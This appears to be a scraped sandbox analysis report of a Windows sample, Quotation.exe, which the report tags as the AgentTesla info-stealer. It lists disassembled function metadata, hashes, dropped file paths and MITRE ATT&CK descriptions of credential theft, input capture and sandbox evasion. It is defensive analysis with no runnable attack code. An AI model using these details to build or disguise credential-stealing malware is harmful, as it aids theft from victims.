GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,004037EE,0000000B), ref: 004068D2
GetProcAddress.KERNEL32(00000000), ref: 004068EE

Part of subcall function 0040617C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406193
Part of subcall function 0040617C: wsprintfW.USER32 ref: 004061CF
Part of subcall function 0040617C: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004061E3

Strings

UXTHEME, xrefs: 004068C4, 004068D1, 004068DC
Error writing temporary file. Make sure your temp folder is valid., xrefs: 004068C5

Memory Dump Source

Source File: 00000004.00000002.2924402104.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2924385227.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2924420597.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2924438748.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2924550776.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Quotation.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID: Error writing temporary file. Make sure your temp folder is valid.$UXTHEME
API String ID: 2547128583-890815371
Opcode ID: 8d13772ca545db48d6537eade3d6ef1f8b9852c922338cf59e69f906f7cb5f01
Instruction ID: cca553acf36b1fe6902a80dcde2ed56f94a70d609a724c5234c7087bacb34bc4
Opcode Fuzzy Hash: 8d13772ca545db48d6537eade3d6ef1f8b9852c922338cf59e69f906f7cb5f01
Instruction Fuzzy Hash: FDD02B331022159BC7002F22AE0894F776DEF66350701403BF541F2230EB38C82295FD

Function 3B148470 Relevance: 5.3, Strings: 4, Instructions: 282COMMON

Download Yara Rule

Strings

$dq, xrefs: 3B14873B
$dq, xrefs: 3B1486D6
$dq, xrefs: 3B14872F
$dq, xrefs: 3B1486CA

Memory Dump Source

Source File: 00000004.00000002.2952343183.000000003B140000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3b140000_Quotation.jbxd

Similarity

API ID:
String ID: $dq$$dq$$dq$$dq
API String ID: 0-185584874
Opcode ID: bf7f54422225ff63cc5a71f17fcaf83b7ae2bf3c4ccc20bbd05fd5a80af681e0
Instruction ID: b687ee20e6f4e95c8bcabb16d6235e4c458911bfc4a04a46d2b23dc87951f182
Opcode Fuzzy Hash: bf7f54422225ff63cc5a71f17fcaf83b7ae2bf3c4ccc20bbd05fd5a80af681e0
Instruction Fuzzy Hash: 8AB13C74E10219CFDB14DF68C95069EB7B2FF89302F248929D40AAB395DB75DC82CB91

Function 3B148888 Relevance: 5.2, Strings: 4, Instructions: 168COMMON

Download Yara Rule

Strings

$dq, xrefs: 3B148913
LRdq, xrefs: 3B1489CA
$dq, xrefs: 3B148907
LRdq, xrefs: 3B14897B

Memory Dump Source

Source File: 00000004.00000002.2952343183.000000003B140000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3b140000_Quotation.jbxd

Similarity

API ID:
String ID: LRdq$LRdq$$dq$$dq
API String ID: 0-340319088
Opcode ID: 2d314b48df33660f8f2fa040e49c7d0b67499bc409b36eba98dc7e8e2caf02c8
Instruction ID: f9efa14ce6c61663722761f3bbb9ff611dfa16273bea68d791b00a80bd1b027d
Opcode Fuzzy Hash: 2d314b48df33660f8f2fa040e49c7d0b67499bc409b36eba98dc7e8e2caf02c8
Instruction Fuzzy Hash: 4551B434B002069FDB04DB28C951A5AB7F2FF8D715F14896DE805AB399DB70EC41CB51

Function 3B14AD50 Relevance: 5.2, Strings: 4, Instructions: 167COMMON

Download Yara Rule

Strings

$dq, xrefs: 3B14AE81
$dq, xrefs: 3B14AED4
$dq, xrefs: 3B14AF2C
$dq, xrefs: 3B14AF03

Memory Dump Source

Source File: 00000004.00000002.2952343183.000000003B140000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3b140000_Quotation.jbxd

Similarity

API ID:
String ID: $dq$$dq$$dq$$dq
API String ID: 0-185584874
Opcode ID: 2d0edbbe15e278d69bf41191b9135f915273ac13a6a890a118dad0905344312c
Instruction ID: 74ba75c7e9d89628aa9e35fd075548f03f45a45fb63a63d7a62ea1814e9e1300
Opcode Fuzzy Hash: 2d0edbbe15e278d69bf41191b9135f915273ac13a6a890a118dad0905344312c
Instruction Fuzzy Hash: DC510574E202089FDB15DB68C591A9EB7F2EF89312F12853AE805EB345DB30DC42CB81

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Quotation.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\nsc3F6A.tmp\System.dll

C:\Users\user\Music\antithetic.ini

C:\Users\user\overlays\besvangredes\Emmens.udk

C:\Users\user\overlays\besvangredes\Flirtish.Dai

C:\Users\user\overlays\besvangredes\Otomaco.Eta

C:\Users\user\overlays\besvangredes\Proprietrer.bet

C:\Users\user\overlays\besvangredes\Trikstanks.pra

C:\Users\user\overlays\besvangredes\boyaus.rom

C:\Users\user\overlays\besvangredes\gear.dra

C:\Users\user\overlays\besvangredes\jagtfalk.ill

C:\Users\user\overlays\besvangredes\regill.ful

C:\Users\user\overlays\besvangredes\sortlistningens.txt

Static File Info

General

File Icon

Windows Analysis Report
Quotation.exe

Function 004036DA Relevance: 80.9, APIs: 32, Strings: 14, Instructions: 416
stringfilecomCOMMON

Function 004066F7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 155
filestringCOMMON

Function 00404F70 Relevance: 63.4, APIs: 35, Strings: 1, Instructions: 374
windowstringCOMMON

Function 00405A1C Relevance: 44.0, APIs: 13, Strings: 12, Instructions: 225
stringregistryCOMMON

Function 0040154A Relevance: 35.4, APIs: 17, Strings: 3, Instructions: 441
stringtimesleepCOMMON

Function 004033CB Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 178
memoryCOMMON

Function 00405E98 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 209
stringCOMMON

Function 00405D18 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 76
stringwindowCOMMON

Function 00403148 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 162
COMMON

Function 0040617C Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Function 00406A34 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 35
COMMON

Function 004068C4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18
libraryloaderCOMMON

Function 00405E1C Relevance: 6.0, APIs: 4, Instructions: 37
COMMON

Function 00406955 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47
registryCOMMON

Function 00405DFC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 12
COMMON

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre